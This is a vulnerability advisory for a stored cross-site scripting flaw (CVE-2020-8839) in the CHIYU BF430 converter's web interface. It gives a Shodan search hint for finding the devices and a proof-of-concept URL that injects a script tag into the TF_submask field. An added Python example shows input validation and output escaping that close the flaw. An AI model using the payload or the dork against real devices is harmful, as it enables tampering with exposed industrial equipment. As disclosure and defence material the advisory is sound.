"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting"

Author: Luca.Chiou
Platform: cgi
Release date: 2020-02-11

# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary device: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839

# 1. Description:
# In the CHIYU BF430 web interface,
# a user can modify the system configuration by accessing /if.cgi.
# Attackers can inject malicious XSS code into the "TF_submask" field.
# The XSS code is stored in the database, which results in a stored XSS vulnerability.

# 2. Proof of Concept:
# Access /if.cgi on the CHIYU BF430 232/485 TCP/IP Converter.
# Inject the XSS code in the "TF_submask" parameter:
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
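
The two server-side controls that close this class of bug, shown on the query string from the proof of concept above. This is an added example, not code from the advisory or from the vendor's firmware; the `FIELD` markup and all function names are assumptions made for illustration.

```python
import html
import ipaddress
from urllib.parse import parse_qs

# Query string exactly as given in the proof of concept above.
PAGE_QUERY = "TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"

# Hypothetical markup for the settings form (assumption, not the device's HTML).
FIELD = '<input type="text" name="TF_submask" value="{}">'


def render_unsafe(stored: str) -> str:
    """Flawed pattern: the stored value is copied into the attribute verbatim."""
    return FIELD.format(stored)


def render_safe(stored: str) -> str:
    """Output encoding: quotes and angle brackets become HTML entities."""
    return FIELD.format(html.escape(stored, quote=True))


def parse_submask(raw: str) -> str:
    """Input validation: accept only a contiguous IPv4 netmask, else raise."""
    try:
        mask = int(ipaddress.IPv4Address(raw))
    except ipaddress.AddressValueError as exc:
        raise ValueError("TF_submask is not a dotted-quad IPv4 value") from exc
    host_bits = mask ^ 0xFFFFFFFF
    # A valid mask is ones followed by zeros, so its inverse is 2**k - 1.
    if host_bits & (host_bits + 1):
        raise ValueError("TF_submask is not a contiguous netmask")
    return str(ipaddress.IPv4Address(mask))


def is_accepted(raw: str) -> bool:
    """True when the value may be written to the configuration store."""
    try:
        parse_submask(raw)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    submitted = parse_qs(PAGE_QUERY)["TF_submask"][0]
    print("accepted:", is_accepted(submitted))
    print("unsafe  :", render_unsafe(submitted))
    print("safe    :", render_safe(submitted))
```

Validation on write keeps the payload out of storage, and encoding on read protects against values that were stored before the check existed.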
